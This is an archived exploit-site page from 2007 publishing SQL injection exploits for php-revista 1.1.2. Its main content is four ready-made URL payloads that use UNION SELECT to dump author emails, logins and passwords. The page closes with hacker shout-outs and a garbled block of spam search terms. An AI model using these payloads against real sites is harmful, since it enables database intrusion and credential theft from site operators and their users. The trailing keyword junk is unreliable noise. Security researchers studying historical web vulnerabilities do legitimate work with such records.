about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , php-revista <= 1.1.2 Multiple Remote SQL Injection Vulnerabilities



2007-03-21 php-revista <= 1.1.2 Multiple Remote SQL Injection Vulnerabilities
Rated as : High Risk

php-revista <= 1.1.2  Remote SQL Injection Exploit

Found by & contact : Cold z3ro , cold-z3ro@hotmail.com

script :
http://downloads.sourceforge.net/php-revista/revista-1.1.2.tgz?modtime=1025654400&big_mirror=0


Exploits :
==============================================================================
Http://www.Victem.0/revista/estilo/[STYLE]/autor.php?id_autor=-12 union
select null,email,login,pwd,null,null,null,null,null,null,null,null,null
from autores where id =1 /*
==============================================================================
Http://www.Victem.0/revista/estilo/[STYLE]/articulo.php?id_articulo=-12
union select
null,email,login,pwd,null,null,null,null,null,null,null,null,null from
autores where id =1 /*
==============================================================================
Http://www.Victem.0/revista/estilo/[STYLE]/busqueda.php?cadena='+union
select null,email,login,pwd,null,null,null,null,null,null,null,null,null
from autores where id =1 /*
==============================================================================
Http://www.Victem.0/revista/estilo/[STYLE]/lista.php?email='+union select
null,email,login,pwd,null,null,null,null,null,null,null,null,null from
autores where id =1 /*
==============================================================================

Styles names :
/discreet/
/galveston/
/mergedidea/
/Widget_Factory/
/Digital_Multiplex/
==========================================================================================================================================
----  GreeTz: |MoHaNdKo|  |Cold One|  |Cold ThreE| |Viper Hacker| |The
Wolf KSA| |o0xxdark0o| |OrGanza| |H@mLiT| |Snake12| |Root Shell|
             |Metoovit| |Fucker_net| |Rageb| |CoDeR| |HuGe| |Str0ke|
|Dr.TaiGaR| |BLacK HackErD| |JEeN HacKer| |Nazy L!unx| |KURTEFENDY|
             |Spid1r Net| |Big Hacker| |Hacccr| |hacoor| || |Geniral C|
|Mr.TyrAnT| |Zax| |Zooz| | Al 3afreat | |The-Falcon-Ksa|
             |The Sniper| | DearMan | |Pro Hackers| | 020 | | abdulla00
" alz3eem" | | The_Viper |Kof2002|
             All i know
==========================================================================================================================================


Big Thx For : www.4azhar.com , Viva My HomeLand Palestine

Print :  Team Hell
securitydot.net - 2007-03-21

Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 16:38:52 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.jwz123 Www.sneha download F www.xseee. Dog.sex.co t311t pppd glob...ans SOUTH INDI mdtm bangalore SOUTH INDI 200 /compo www.mnjyw. game k750 news for c remote exp www.yazes. Sexygils maxcpm.inf 200 /compo Avezon ima socks DatsoGalle www.zimfac CMS is Fre Gadis cant interconex www.45161. Www.six t597t Malluboobs xxlxusa Pornobugil search/exp ciara Hotpussz SANIA MIRZ Www.womans maxcpm.inf phpBB++por news for c Hotpussz news for c www.konka. news for c adal black VNC Foto cewek blog.luck1